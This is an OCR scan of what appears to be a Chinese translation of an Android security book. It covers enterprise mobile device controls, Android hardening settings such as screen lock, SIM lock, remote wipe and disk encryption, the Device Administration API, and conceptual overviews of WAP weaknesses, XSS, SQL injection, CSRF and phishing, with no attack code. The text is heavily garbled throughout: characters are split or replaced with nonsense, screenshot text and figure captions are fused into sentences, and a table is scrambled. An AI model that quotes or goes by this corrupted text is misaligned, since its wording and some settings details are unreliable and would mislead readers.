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程序 时 ， 应 充分 考虑 开发 产品 的 安全 性 。 编 写 最 佳 的 代码 处 理 过 程 (如 输入 验证 、 
俞 出 编码 ， 以 及 错误 检查 等 ) 是 实现 该 守则 的 重要 组 成 部 分 。 在 保护 移动 设备 信 
息 安 全 的 问题 上 ， 其 他 的 标准 (例如 ，NIST 800:53 人 和 PCI DSSS) 有 着 类 似 的 规 
定 。 在 本 质 上 ， 这 些 标准 的 核心 都 是 强调 对 移动 资产 的 威胁 因素 进行 定期 的 评估 、 
确定 安全 问题 、 落 实 防 控 措施 ， 以 及 加 强 对 终端 用 户 和 开发 人 员 的 安全 教育 。 


9.1.4 移动 设备 安全 措施 推荐 


针对 企业 环境 下 移动 设备 的 安全 控制 措施 ， 主 要 可 以 分 为 以 下 四 类 : 

1) 功能 上 的 制度 和 约束 : 限制 用 户 和 应 用 程序 使 用 移动 设备 上 的 部 分 便 件 功 
能 (例如 ， 照 相机 、GPS)， 配 置 无 线 网 络 和 虚拟 专用 网 (Virtual Private Network, 
VPN)， 将 用 户 在 企业 环境 下 在 移动 设备 上 的 使 用 记录 /违规 操作 发 送 到 远程 服务 
全 ， 提 供用 户 可 以 使 用 的 应 用 程序 白 名 单 ， 以 及 阻 I 上 root 处 理 过 的 设备 访问 企业 资 
源 和 网 络 。 

2) 数据 保护 : 主要 包括 对 本 地 存储 和 外 部 存储 加 密 、 使 用 VPN 通信 访问 受 保 
护 的 资源 ， 以 及 使 用 强大 的 通信 加 密 算 法 。 此 外 ， 还 包括 在 丢失 或 被 盗 的 设备 上 ， 
使 用 远程 擦 除 功 能 。 

3) 访问 控制 : 主要 包括 设备 用 户 的 身份 验证 〈 例 如 ， 验 证 PIN 码 、SIM 95 
53), ， 以 及 使 用 每 个 应 用 程序 时 需要 密码 验证 使 用 者 身份 。 此 外 ， 当 设备 闲置 一 段 
时 间 后 (推荐 为 2 -5min), ， 需 要 重新 输入 PIN 码 / 密 码 验 证 使 用 者 的 身份 。 

4) 应 用 程序 : 专门 针对 应 用 程序 实施 的 控制 措施 ， 主 要 包括 对 应 用 程序 来 
源 / 应 用 程序 市 场 的 审核 ;， 要求 用 户 只 能 从 审核 通过 的 应 用 程序 源 / 应 用 市 场 上 下 
载 、 安 装 应 用 程序 和 更 新 应 用 程序 ; 仅 允 许 用 户 安装 可 靠 的 应 用 程序 (即使 用 可 
靠 的 数字 证 书签 名 的 应 用 程序 ); 禁止 用 户 使 用 基于 公共 云 的 应 用 程序 数据 备 


C) NIST 800-53 即 推荐 的 联邦 信息 系统 和 组 织 的 安全 控制 措施 ， 是 NIST ( National Institute of Standards 
and Technology， 美 国 国家 标准 与 技术 研究 院 ) 在 FISMA 项 目 实施 中 产生 的 重要 安全 标准 和 指南 之 
一 ， 是 信息 安全 风险 管理 框架 的 重要 组 成 部 分 。 该 标准 主要 介绍 了 安全 控制 措施 选择 和 标准 化 的 基 
本 概念 ， 以 及 为 信息 系统 选择 和 说 明 控 制 措施 的 过 程 ， 以 帮助 组 织 部 分 达到 对 信息 系统 安全 和 风险 
的 有 效 管理 。 它 为 选择 和 规定 信息 系统 安全 控制 措施 提供 了 指导 原则 ， 为 安全 管理 者 、 安 全 服务 提 
供 者 、 安 全 技术 开发 人 员 、 系 统 开发 人 员 、 系 统 实施 人 员 和 系统 评估 者 提供 了 指导 。 一 EHE 

© PCI DSS (Payment Card Industry Data Security Standard ， 支 付 卡 行业 数据 安全 标准 )， 也 称 为 第 三 方 文 
付 行业 数据 安全 标准 ， 是 由 PCI 安全 标准 委员 会 的 创始 成 员 (Visa, MasterCard, American Express, 
Discover Financial Services, JCB 等 ) 制定 的 ， 旨 在 使 国际 上 采用 一 致 的 数据 安全 措施， 该 标准 (PCI 
DSS) 在 支付 网 关 的 安全 方面 做 出 标准 的 要 求 ， 其 中 包括 安全 管理 、 策 略 、 过 程 、 网 络 体系 结构 、 软 
件 设计 的 要 求 列 表 等 ， 全 面 保障 交易 安全 。 适 用 于 所 有 涉及 支付 卡 处 理 的 实体 ， 包 括 商户 、 处 理 机 
构 、 购 买 者 、 发 行商 和 服务 提供 商 及 储存 、 处 理 或 传输 持 卡 人 资料 的 所 有 其 他 实体 。 此 外 ，PCI DSS 还 
包括 一 组 保护 持 卡 人 信息 的 基本 要 求 ， 并 可 能 增加 额外 的 控制 措施 ， 以 进一步 降低 风险 。 一 一 详 者 注 
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份 / 恢 复 服务 。 
9.2 强化 Android 安全 性 


上 一 节 主 要 分 析 了 篆 见 的 移动 设备 的 威胁 方式 ， 以 及 一 些 可 以 采用 的 威胁 应 对 
措施 。 本 节 将 详细 介绍 如 何 配 置 (强化 ) Android 设备 的 安全 设置 ， 以 降低 各 种 安 
全 风险 。 对 此 ， 本 节 将 从 两 个 部 分 进行 介绍 : 通过 更 改 安全 配置 (强化 ) 增强 
Android 设备 的 安全 性 和 开发 安全 的 Android 应 用 程序 。 


9.2.1 安全 部 署 Android 设备 


Android 设备 出 三 时 ， 系 统 被 设置 为 默认 的 出 厂 模式 。 然 而 出 于 安全 考虑 ， 将 
设备 配置 成 最 佳 的 安全 设置 ， 以 及 用 户 所 需 的 各 种 功能 设置 〈( 即 确保 设备 安全 性 
的 各 种 安全 设置 ) ， 往 往 需 要 用 户 自 行 配 置 ， 尤 其 对 于 企业 环境 来 说 ， 更 是 如 此 
BR Android 系统 版 本 的 不 断 升级 ，Android 系统 的 安全 设置 方式 也 随 之 不 断 改进 ， 
配置 起 来 变 得 更 加 上 容易。 用户 所 做 的 各 种 安全 配置 既 可 以 直接 应 用 在 本 地 设备 上 ， 
也 可 通过 Exchange ActiveSync 邮件 机 制 推送 到 其 他 Android 设备 上 。 此 外 ， 有 些 
Android 设备 厂商 还 提供 了 额外 的 系统 安全 配置 工具 软件 (厂家 自主 开发 的 或 第 三 
方 软件 开发 商 提 供 的 ) ， 供 用 户 快 捷 地 增强 设备 的 安全 性 能 。 

1. 未 授权 的 设备 访问 

正如 本 章 前 面 所 提 到 的 ,缺乏 对 移动 设备 
的 实际 管控 ， 是 用 户 和 企业 在 增强 Android 设 
备 安 全 性 时 ， 需 要 面 对 的 主要 问题 之 一 。 对 于 
这 一 问题 ， 可 以 在 Android 设备 上 通过 下 述 安 
全 功能 配置 子 以 一 定 程度 的 缓解 。 

(1) REAM 

该 功能 设置 局 用 后 ， 用 户 需要 输入 正确 的 
PIN 码 或 密码 后 ， 才 可 以 使 用 Android 设备 。 
当然 ， 用 户 也 可 以 不 使 用 这 种 设置 , 但是， 出 
于 确保 移动 设备 的 安全 性 ， 本 书 强 烈 建议 用 户 
使 用 该 功能 设置 。 启 用 此 设置 ， 需 要 按照 如 下 
操作 流程 进行 设置 “Settings”-> “Secur- 
ty” -> "Screen Lock", 然后 在 “PIN” 和 
“Password ”中 选择 一 项 ， 作 为 屏幕 解锁 的 密 
码 形式 。 本 书 建议 用 户 使 用 复杂 的 密码 或 8 位 
的 PIN 码 作 为 屏幕 解锁 密码 〈 设 置 过 程 如 
图 9.1 所 示 )。 当 “Screen Lock ( 锁 屏 )” 功 图 9.1 局 用 锁 屏 功能 
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能 局 用 后 ， 用 户 还 应 当 同 时 更 新 目 动 锁 屏 超 时 间 隅 仁 〈 见 图 9.2)。 


(2) 设置 SIM 卡 锁定 

开局 “SIM 卡 锁 定 功 能 (SIM card lock)” 
后 ， 设 备 会 强制 用 户 输入 PIN 码 ， 只 有 输入 正 
确 的 PIN 码 ， 用 户 才 能 使 用 “手机 ”功能 。 否 
则 ， 用 户 将 无 法 拨打 电话 或 发 送 短 信 。 开 启 SIM 
卡 锁 定 功 能 ， 需 要 按照 如 下 操作 流程 进行 设置 : 
依次 进入 “Settings” -> “Set up SIM card lock” 
(如 图 9.3 和 图 9.4 所 示 )， 然后 局 用 “Lock 
SIM card” 选 项 设置 。 设 置 一 个 与 屏幕 解锁 密码 
不 同 的 什 ， 作 为 解锁 SIM 卡 的 PIN 码 。 

(3) 远程 擦 除 

系统 管理 员 能 够 通过 Exchange ActiveSync HB 
件 机 制 ， 启用 “远程 擦 除 ” 功 能 。 如 果 用 户 的 
Android 设备 连接 到 公司 的 Exchange 服务 器 ， 那 
么 当 设 备 于 失 或 被 资 时 ， 激 活 远 程 擦 除 功 能 ， 
擦 除 Android 设备 上 的 重要 资料 数据 ， 对 于 确保 
移动 设备 的 信息 安全 性 至 关 重 要 。 此 外 ， 使 用 
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图 9.2 自动 锁 屏 超时 间 陋 值 


Exchange ActiveSync 邮件 机 制 ， 还 可 以 将 其 他 的 功能 设置 (例如 ， 密 码 复 淋 度 验 
证 ) 推送 到 移动 设备 上 ， 从 而 实现 移动 设备 的 远程 管控 ， 这 部 分 内 容 在 本 章 的 后 


面 将 会 介绍 。 
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图 9.3 局 用 SIM 卡 锁 
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图 9.4 向 SIM 卡 锁 输 入 PIN 码 
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远程 擦 除 功 能 可 以 将 手机 上 的 所 有 数据 擦 除 掉 ， 将 手机 恢复 到 出 三 状态 。 擦 除 
的 内 容 包 括 有 所 有 的 电子 邮件 数据 ， 以 及 应 用 程序 设置 等 。 不 过 ， 远 程 擦 除 功 能 无 法 
删除 存储 在 外 部 SD 卡 上 的 数据 资料 。 

2. 其 他 设置 

除了 上 述 功 能 设置 外 ， 本 书 强 烈 建 议 Se 
Android 设备 用 户 禁 用 “Make password visible Automatically lock 
CHET)” xxu, ATDAN x ”国有 
舌 探 用 户 在 移动 设备 上 的 操作 、 用 户 隐 私 ， 及 
个 人 数据 。 禁 用 这 一 功能 ， 可 以 使 用 户 在 设备 A-s 
上 输入 密码 或 PIN 码 时 ， 输 入 的 字符 不 会 在 屏 Setup SIM card lock 
幕 上 回 显 出 来 。 用 户 可 按照 如 下 操作 禁用 该 功 passwonos 
BE: HA “Settings” Jp, Jt “Make pass- only s ioie 
word visible" 选项， 如 图 9.5 所 示 。 —vicmdeme 

此 外 ， 本 书 还 建议 用 户 禁用 “Unknown E 
Sources (允许 安 狠 来 自 示 知 源 的 应 用 程序 )” ei ooo en ttn sur 
选项 。 本 书 前 面 已 经 提 到 ， 对 于 Android 系 
统 来 说 ， 除 了 Google Play” 外 ， 还 有 很 多 的 
二 级 应 用 程序 商店 。 对 于 从 未 知 源 下 载 的 应 图 9.5 禁用 “Make password visible” 和 
HEF, SAEM, HA MERE aE f Unknown, Sources 37 
性 之 后 ， 再 去 信任 并 安装 这 些 应 用 程序 。 蔡 
FH "Unknown Sources” 选 项 ， 可 以 阻止 从 其 他 源 下 载 的 应 用 程序 ， 被 用 户 安装 在 
Android 设备 上 ， 如 图 9.5 所 示 。 

此 处， 在 增强 Android 设备 的 安全 性 方面 ， 还 有 一 条 重要 的 原则 就 是 ， 关 掉 所 
有 不 需要 的 服务 。 用 户 应 当 关 掉 “ 蓝牙 ”"、“NFC” 和 “定位 功能 ”， 除 非 需要 使 用 
这 些 功能 ( 见 图 9.6)。 同 时 ， 用 户 还 应 当 到 Wi-Fi 设置 界面 关 掉 “Network notifi- 
cation (网 络 通知 )” 功 能 ( 见 图 9.7)。 这 可 以 使 用 户 自己 选择 一 个 Wi-Fi 网络 来 
连接 ， 而 使 设备 不 能 自动 连接 到 任何 可 获得 的 Wi-Fi 网络。 此 外 ， 不 建议 用 户 将 设 
备 上 的 数据 备份 到 “Gmail 或 Google” 账户 上 或 Dropbox? E, 此 外 ， 创 建 一 个 可 供 
用 户 使 用 的 应 用 程序 白 名 单 ， 将 所 有 通过 安全 审核 的 可 徘 的 应 用 程序 列 在 这 个 名 单 
上 。 然 后,， 通 过 安全 教育 和 培训 ， 使 设备 用 户 自觉 地 使 用 名 单 上 的 应 用 程序 ， 而 不 
去 下 载 并 安装 名 单 之 外 的 、 其 他 未 经 审核 的 应 用 程序 。 


Power button instantly locks 


Owner into 





C) Google Play, Google 电子 市 场 ， 其 前 身 名 为 Android Market， 是 一 个 由 Google 公司 为 Android 设备 开发 
的 在 线 应 用 程序 商店 。 一 一 译 者 注 

C Dropbox 是 一 个 提供 同步 本 地 文件 的 网 络 存 储 在 线 应 用 。 支 持 在 多 台电 脑 多 种 操作 中 自动 同步 ， 并 可 
当 作 大 容量 的 网 络 硬盘 使 用 。 一 一 译 者 注 
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图 9.6 ZH “EMRA” 图 9.7 禁用 “网 络 通知 ”功能 


Android 4. 2 版 本 的 系统 增加 了 一 个 新 的 功能 ， 提 升 了 对 恶意 应 用 程序 的 防范 
能 力 。 该 功能 开启 后 ， 系 统 会 通过 Google 对 正在 安装 的 应 用 程序 进行 在 线 验 证 。 
然后 ，Android 系统 将 根据 该 应 用 程序 的 风险 情况 ,告诫 用 户 安装 该 应 用 可 能 种 来 
危害 。 需 要 注意 的 是 ， 系 统 验证 应 用 程序 的 过 程 中 ， 需 要 网 Google 发 送 一 些 数据 

EE URL, iX ID 和 操作 系统 信息 等 ) 。 要 想 开 局 这 一 功能 ， 需 要 依次 进行 

述 操 作 : “Settings” -> “Security” -> “ Verify Apps” o 

在 Android 系统 上 ， 男 一 个 比较 实用 的 功能 是 ， 启 用 “Always on VPN 〈 总 是 通 
过 VPN 连接 网 络 )”。 该 功能 开启 时 ， 应 用 程序 只 有 通过 系统 开启 的 VPN 才能 连接 
到 网 络 ， 如 果 VPN 处 于 关闭 状态 ， 应 用 | 程序 将 无 法 连接 到 外 部 网 络 ， 此 外 ， 本 书 
还 建议 用 户 关 掉 Android 设备 上 的 USB 调试 功能 ， 如 图 9. 8 所 示 。USB 调试 功能 
可 以 使 用 户 将 手机 连接 到 adb shell 上 ， 导 致 设备 上 的 信息 被 完整 列 出 ， 造 成 
泄露 。 

在 Android 设备 上 ， 浏览 器 是 最 常用 的 应 用 程序 之 一 。 用 户 应 当 谨 慎 地 配置 浏 
览 器 的 安全 和 隐私 设置 (例如 ， 禁 用 位 置 访问 ) ， 图 9.9 展示 了 浏览 器 应 用 程序 的 
各 种 安全 设置 选项 。 

3. 加 密 

Android 3. 0 及 后 续 版 本 的 系统 都 具有 全 部 磁盘 加 密 的 功能 (不 包括 SD 卡 )。 
启用 该 功能 ， 可 以 对 手机 上 的 所 有 数据 进行 加 密 。 当 手机 丢失 或 被 瓷 时 ， 经 过 加 密 
的 数据 如 果 没 有 密码 将 无 法 恢复 。 不 过 ， 这 里 需要 说 明 的 是 ， 锁 屏 密码 务必 要 和 磁 
盘 加 密 密 码 一 致 。 一 旦 手机 被 加 密 ， 在 设备 开机 引导 时 ， 需 要 用 户 输入 锁 屏 密码 ， 
对 手机 进行 解密 。 

开启 手机 磁盘 加 密 功 能 ,需要 用 户 使 用 手机 完成 以 下 步 缀 : 

1) 设置 一 个 强大 的 PIN 码 或 密码 。 
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图 9.8 # “USB 调试 ”功能 图 9.9 浏览 器 安全 设置 选 


2) 插 上 电源 给 手机 充电 

当 用 户 准备 好 加 密 手 机 磁盘 时 ， 需 依次 进行 下 述 
WE: “Settings” -> "Security" -> “Encrypt phone Bl 
Cnm 9L)", SERES “Encrypt phone” 设 置 界 面 ， 有 


settings, downloaded apps and 


局 用 “Enerypt phone” 功 能 ， 输 入 锁 屏 密码 或 PIN their data, media, and othe 


JaVOU encrypt yout 


2 小 n 4 = -J. mE ^ A ps f h OU- si ent - 
码 。 开 局 手机 加 密 后 ,用 户 乱 要 在 手机 开机 引导 时 ， i benno bo 
decrypt tt ea ht me you power 


tai A E JF- A nd uy PIN 但 解 除 手 机 ] JI 255 E Aq KE 。 " Encrypt i iton you can t unencrypt your 


phone except by performing a 


phone" lx B 界面 如 图 9. 10 所 示 C tason ig reset erasing all 
9.2.2 设备 管理 


Android 2. 2 版 本 之 后 的 系统 ， 为 程序 开发 者 提 
供 了 一 套 Android 设备 管理 API ( Android Device 
Administration API, Android 设备 管理 应 用 程序 编程 接 
口 ，ADAAPI) 。 这 套 API 用 于 开发 对 安全 性 敏感 的 图 9. 10 手机 加 密 
企业 应 用 程序 。 

Android 系统 内 置 的 电子 邮件 程序 ， 使 用 这 套 API 改进 了 对 Exchange 服务 机 
制 2 的 支持 ， 使 管理 员 能 够 借 此 执行 某 些 特定 的 安全 设置 ， 如 远程 擦 除 、 锁 屏 、 超 时 、 





© Exchange 服务 机 制 ， 是 一 个 消息 与 协作 系统 ， 它 是 由 客户 端 和 Exchange 服务 器 构成 的 。 其 中 ， 
Exchange 服务 器 可 以 被 用 来 构架 应 用 于 企业 、 学 校 的 邮件 系统 ， 甚 至 于 类 似 搜狐 或 新 浪 那 样 的 免费 
邮件 系统 。Exchange 服务 器 还 是 一 个 协作 平台 。 你 可 以 在 此 基础 上 开发 工作 流 、 知 识 管理 系统 、 合 
令 收 发 控制 系统 或 者 是 其 他 消息 系统 。 一 一 译 者 注 
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密码 复杂 性 验证 ， 以 及 加 密 等 同样 ,第 三 方 软件 商 开 发 提供 的 移动 设备 管 
( Mobile Device Management, MDM) 程序 ， 也 需要 使 用 这 套 API， 实 现 对 Android 


设备 的 管理 。 


系统 管理 员 或 开发 者 使 用 这 和 套 API 编写 对 安全 性 敏感 的 应 用 程序 。 这 类 应 用 程 


序 能 够 执行 本 地 或 远程 安全 策略 。 其 中 ， 本 地 安 
全 策略 可 以 在 本 地 应 用 程序 中 以 硬 编码 的 形式 实 
现 ， 也 可 以 是 从 远程 服务 器 上 取得 ( 例如， 通过 
电子 邮件 的 Exchange 服务 器 ， 如 图 9.11 所 示 )。 
通常 情况 下 ， 用 户 需 要 从 Google Play 或 其 他 的 安 
装 媒介 上 获得 并 安装 这 类 应 用 程序 。 以 电子 邮件 
程序 为 例 ， 默 认 情 况 下 ，Android 系统 预先 安装 
了 电子 邮件 应 用 程序 。 因 此 ， 当 设备 同步 /连接 
到 企业 Exchange 服务 器 时 ， 通 过 该 应 用 程序 向 用 
户 设 备 推送 安全 素 上 略 就 变 得 相当 的 容易 和 便捷 。 
一 旦 这 类 应 用 程序 安 沪 完 成 (或 配置 完毕 ， 以 电 
子 邮件 程序 为 例 ) ， 系 统 就 会 提示 用 户 ， 激 活 设备 
管理 应 用 程序 。 如 果 用 户 同意 这 样 做 ， 安 全 策略 
就 会 继续 提示 用 户 进行 下 一 步 功 能 设置 。 不 过 ， 
如 果 用 户 拒 绝 激活 设备 管理 应 用 程序 ， 用 户 将 被 





Device administrators 


Email 


图 9.11 电子 邮件 应 用 程序 推送 
服务 器 定义 的 策略 


禁止 使 用 一 些 特定 的 功能 (例如 ， 连 接 并 访问 企业 资源 、 同 Exchange 服务 大 同步 ) 。 


Android 设备 管理 API 文 持 的 部 分 安全 采 略 如 下 ， 这 


理 程序 执行 。 

e 启用 密码 

e 最 小 密码 长 度 

e 密码 强度 /复杂 性 
e 密码 过 期 

e 密码 历史 记录 限制 
e 锁 屏 超时 

e 存储 加 密 

e 远程 擦 除 


些 安全 宽 略 能 够 被 设备 管 


在 Android 系统 上 ， 通 过 电子 邮件 应 用 程序 推送 的 安全 策略 ， 如 图 9. 12 所 示 。 
这 些 策 略 属于 需要 在 企业 环境 下 执行 的 一 些 比较 有 代表 性 的 策略 。 
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图 9.12 通过 电子 邮件 应 用 程序 推送 的 安全 策略 


9.3 小 结 


本 章 首 先 分 析 了 企业 环境 下 部 署 移动 设备 存在 的 各 种 安全 问题 ， 以 及 如 何 去 减 
少 这 些 间 题 。 随 后 ， 本 章 简 要 但 全 面 地 介绍 了 Android 系统 上 的 各 种 安全 功能 设 
置 ， 通 过 这 些 安全 功能 设置 ， 可 以 有 效 地 降低 部 分 安全 风险 。 最 后 ， 通 过 对 
Android 设备 管理 API 机 制 进行 分 析 ， 得 出 结论 ， 即 可 以 使 用 这 套 设 备 管理 API 在 
Android 设备 上 执行 各 种 安全 策略 ， 从 而 确保 移动 设备 和 企业 资源 的 安全 。 
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本 章 主 要 审视 移动 设备 上 的 HTML 和 浏览 器 的 安全 问题 ,介绍 各 种 可 能 发 生 
的 不 同类 型 的 攻击 ， 以 及 浏览 硕 的 漏洞 。 最 后 ， 本 章 将 讨论 借助 移动 设备 可 能 发 起 


的 各 种 高 级 别 的 攻击 手段 。 


10.1 移动 HTML 安全 


随 厦 移动 设备 的 日 益 普 及 和 越 来 越 多 的 人 开始 使 用 移动 设备 访问 网 站 获取 信 


， 传 统 的 网 站 模式 因此 而 逐步 发 展演 化 。 起 初 ， 移 
cd VA dir HH. BE A f dE BR Pg v (C rir [9] s: pr Fen Jp 
的 网 站 ) 上 获取 信息 。 如 今 ， 大 部 分 网 站 已 经 开始 文 
持 无 线 应 用 程序 协 " ( v Application Protocol, 
WAP) 技术 或 移动 HTML (一 种 面向 移动 设备 的 简化 
网 站 ) 。 

WAP 规范 定义 了 一 组 协议 族 ， 用 于 实现 通过 移动 
设备 更 加 高 效 地 查看 网 站 信息 。WAP 协议 族 由 以 下 各 
层 构成 〈( 见 图 10.1): 无 线 数 据 报 协议 (Wireless Data- 
gram Protocol, WDP), 、 无 线 传输 层 安 全 (Wireless Trans- 
port Layer Security，WTLS ) 、 无 线 传 输 协 议 ( Wireless 
Transaction Protocol，WTP)、 无 线 会 话 协 议 (Wireless 
Session Protocol, WSP) 和 无 线 应 用 程序 环境 ( Wireless 
Application Environment，WAE)。 该 协议 族 可 在 任何 无 线 
网 络 上 工作 。 协 议 族 内 各 层 详细 介绍 见 表 10. 1。 


表 10,1 WAP 协议 族 


层 说 。 Hj 





ETT 有 程序 环境 (WAE) 


无 线 会 话 协议 (WSP) 


无 线 传输 协议 (WTP) 


无 线 传输 层 安全 (WTLS) 


无 线 数据 报 协 议 (WDP) 


无 线 网 络 


10.1 WAP 协议 族 


位 于 协议 族 的 最 底层 ， 对 上 层 提 供 不 可 靠 的 数据 传输 (例如 ，UDP) x 


Fg 办 议 ( WDP 
TARW (WDP) | 竺 和 其 他 类 似 于 传输 层 功能 的 支持 


无 线 传输 层 安全 (WTLS) 提供 公 钥 加 密 安 全 机 制 


无 线 传输 协议 (WTP) 提供 可 靠 的 传输 支持 ( 例如， 可靠 的 请 求 和 啊 应 ) 
无 线 会 话 协议 (WSP) 提供 HTTP (Hyper Text Transport Protocol, 超 文 本 传输 协议 ) 功能 
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( 续 ) 
层 说 明 
提供 无 线 标记 语言 (Wireless Markup Language, WML), WMLSceript 和 无 
线 电 话 应 用 (Wireless Telephony Application, WTA) 程序 接口 。WML 是 一 
种 类 似 于 HTML ( Hypertext Markup Language， 超 文本 标记 语言 ) 的 标记 语 
言 ，WMLSeript 是 一 种 类 似 于 JavaScript 的 脚本 语言 ，WTA 支持 电话 功能 


无 线 应 用 程序 环境 (WAE) 


在 典型 的 互联 网 或 WWW (World Wide Web, 万 维 网 ) 模型 里 ， 客 户 端 将 请 求 
发 送 给 服务 器。 服务 磊 处 理 收 到 的 请 求 并 向 客户 端 发 回 啊 应 〈 或 内 容 ) ， 如 图 10.2 
所 示 。 在 WAP 模型 中 ， 该 过 程 或 多 或 少 和 WWW 模型 的 过 程 有 些 类 似 。 不 过 ,在 
WAP 模型 中 ， 客 户 端 和 服务 器 之 间 存 在 一 个 网 关 或 代理 ， 它 会 对 这 些 请 求 和 响应 
进行 处 理 ( 编码 /解码 )， 使 这 些 请 求 和 响应 更 加 适合 移动 设备 ， 如 图 10. 3 所 示 。 
同 1.0 版 本 的 WAP 相 比 ，2. 0 版 本 的 WAP 提供 了 更 加 丰富 的 功能 支持 和 端 到 端的 
安全 支持 。 


请 求 





响应 (内容) 


10.2 WWW 模型 
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图 10.3 WAP 模型 


1. 0 版 本 的 WAP 没有 提供 端 到 问 的 SSL/TLS 支持 。 在 WAP 1.0 里 ， 移 动 设 备 
同 WAP 网 关 之 间 的 传输 使 用 WTLS 加 密 。 但 是 ， 这 些 传输 会 在 代理 /网 关 服 务 器 处 
终止 。 网 关 和 应 用 程序 /HTTP 服务 器 之 间 的 传输 则 使 用 TLS/SSL 进行 。 这 就 将 
WAP 1.0 的 传输 漏洞 录 露 给 了 MITM ( Man- In- The- Middle, FEJA) 攻击。 而且， 
从 WAP 网 关上 可 以 获得 各 种 敏感 的 信息 (这 些 信息 以 明文 的 形式 存在 ) 。 这 就 意 
味 着 如 果 WAP 网 关 /代理 遭 到 破坏 ， 可 能 会 导致 严重 的 安全 漏洞 出 现 。 在 WAP 
2.0 中 ， 这 一 问题 通过 WAP 2.0 提供 的 端 到 问 SSLATLS 功能 支持 得 到 了 修复 。 

此 外 ，WAP 和 移动 HTML 网 站 还 容易 受到 典型 Web 应 用 程序 攻击 ， 包 括 跨 站 
点 脚本 攻击 、SQL 注 人 攻击 、 跨 站 点 伪造 请 求 攻 击 和 网 络 钓鱼 。 移 动 浏览 器 是 功能 
完善 的 浏览 需 ， 它 的 功能 一 点 都 不 比 桌 面 电脑 版 本 的 浏览 器 差 。 在 移动 浏览 器 上 ， 
同样 支持 cookies、 脚 本 (Script), AX flash 等 功能 。 这 就 意味 着 移动 设备 的 用 户 
也 将 会 遭受 同人 台式 机 /笔记 本 电脑 用 户 一 样 的 攻击 。 本 章 将 简要 介绍 这 些 攻击 ， 如 
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采 读 者 想 要 了 解 更 多 有 关 这 些 攻击 的 详细 信息 ， 可 以 参考 OWASP (Open Web Ap- 
plication Security Project， 开 放 Web 应 用 程序 安全 项 目 ) 网 站 。 


10.1.1 跨 站 点 脚本 攻击 


路 站 点 脚本 (Cross- Site Scripting, CSS/XSS) 能 够 在 Web 页 面 中 注入 客户 端 
脚本 ， 使 攻击 者 绕 过 访问 控制 机 制 。XSS 攻击 可 以 
使 攻击 者 获得 用 户 的 会 话 信 息 (例如 cookies), p 
后 攻击 者 利用 这 些 信 息 绕 过 访问 控制 机 制 。 图 10. 4 
所 示 为 使 用 Android 浏览 器 访问 一 个 存在 漏洞 的 网 
站 ， 因 此 遭受 到 反射 型 XSS 攻击 的 例子 。 

XSS 攻击 的 实质 是 不 可 信用 户 的 输入 没有 经 过 ons Pees ome says: 
彻底 地 审查 和 消毒 / 转 义 。 在 XSS 攻击 的 情况 下 ， 
网 站 系统 没有 对 用 户 的 输入 进行 消毒 ， 因 此 导致 用 
PA SET EDU as PB (MAKIJA KSS), 要 
么 被 存储 起 来 (持久 型 XSS) ， 留 到 以 后 被 查看 。 

和 一 般 的 网 站 一 样 ， 移 动 网 站 很 容易 遭 到 KSS 
攻击 。 因 为 移动 HTML 在 对 用 户 输入 验证 /消毒 方面 
所 做 的 控制 措施 更 少 。 如 果 能 够 像 处 理 一 般 网 站 那 
样 处 理 移动 HTML， 对 用 户 的 输入 采用 恰当 的 验证 ， 5104 BATES xS 例子 
就 能 够 有 效 地 防止 移动 网 站 遭受 XSS 攻击 。 


10.1.2 SQL 注入 攻击 


SQL 注 人 能 够 把 来 自 客户 端的 SQL 查询 指令 注入 应 用 程序 。 一 次 成 功 的 SQL 
查询 (或 攻击 ) 可 以 将 敏感 的 数据 信息 提供 给 攻击 者 ， 使 攻击 者 绕 过 访问 控制 机 
制 ， 运 行 各 种 管理 操作 命令 ， 并 且 查 询 / 更 新 /删除 数据 库 数据 。 

SQL 注 人 攻击 的 实质 是 没有 对 不 可 信用 户 的 输入 进行 验证 ， 直 接 将 这 些 输 入 用 
于 各 种 SQL 查询 ， 这 些 SQL 查询 命令 直接 面向 后 端 数 据 库 进行 操作 。 

与 XSS 攻击 类 似 ， 移动 HTML 和 WAP 网 站 很 容易 遭受 SQL 注入 攻击 ， 移 动 网 
站 很 有 可 能 同 如 面 电 脑 网 站 一 样 存在 相同 的 漏洞 ， 或 者 移动 网 站 的 问题 更 为 突出 。 
当 移 动 网 站 接收 用 户 输 入 时 ， 移 动 网 站 可 能 并 没有 对 这 些 用 户 输入 进行 验证 。 因 
此 ， 对 于 这 一 问题 ， 使 用 参数 化 的 查询 或 存储 过 程 能 够 有 效 地 阻止 SQL 注 人 攻击 
的 发 生 。 


10.1.3 跨 站 点 伪造 请 求 攻击 


跨 站 点 伪造 请 求 (Cross-Site Request Forgery, CSRF, XSRF) 攻击 能 够 利用 已 
经 得 到 网 站 验证 的 用 户 ， 冒 用 其 身份 下 达 有 害 (未 授权 ) 的 命令 。 出 于 对 已 验证 
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用 户 的 信任 ， 网 站 不 会 怀疑 从 该 用 户 发 出 的 各 种 命令 。 在 CSRF 攻击 中 ， 网 站 是 对 
用 户 信任 的 受害 者 ， 而 在 XSS 攻击 中 ， 用 户 则 是 对 服务 器 /网 站 信任 的 受害 者 。 

在 移动 设备 上 ， 用 户 身份 一 般 会 被 其 访问 的 多 个 网 站 验证 。 这 样 就 使 得 CSRF 
攻击 成 为 可 能 ， 就 像 他 们 在 台式 /笔记 本 电脑 上 面 的 情况 一 样 。 而 且 ，CSRF 攻击 
能 够 利用 较 小 的 界面 和 UI 布局 进行 伪装 (例如 ， 伪 装 成 带 有 URL 链接 的 电子 邮 
件 )， 从 而 诱骗 用 户 在 网 站 上 执行 有 害 的 操作 。 


10.1.4 网 络 钓鱼 


网 络 钓 鱼 的 主要 攻击 目标 是 没有 戒心 的 用 户 , 诱骗 他 们 提供 敏感 的 信息 (全 
如 ，SSN、 密 码 ， 以 及 信用 卡号 等 )。 借 助 社会 工程 化 的 手段 ,攻击 者 诱骗 用 户 进 
人 看 起 来 合法 的 网 站 执行 某 些 特定 的 操作 。 相 信 这 些 网 站 及 其 请 求 (典型 的 例子 
如 电子 邮件 里 的 请 求 链接 等 ) 的 用 户 会 执行 一 些 攻击 者 诱导 的 操作 ， 从 而 将 敏感 
信息 提供 给 了 攻击 者 。 

举例 来 说 ， 用 户 收 到 一 封 貌 似 合法 的 电子 邮件 。 从 表面 上 来 看 ， 该 电子 邮件 是 
从 和 用 户 有 业务 往来 的 银行 发 出 的 。 邮 件 声称 由 于 近期 银行 的 安全 漏洞 问题 ， 需 要 
用 户 更 改 他 的 银行 密码 。 出 于 方便 用 户 的 考虑 ， 邮 件 中 直接 给 用 户 提 供 一 个 更 改 密 
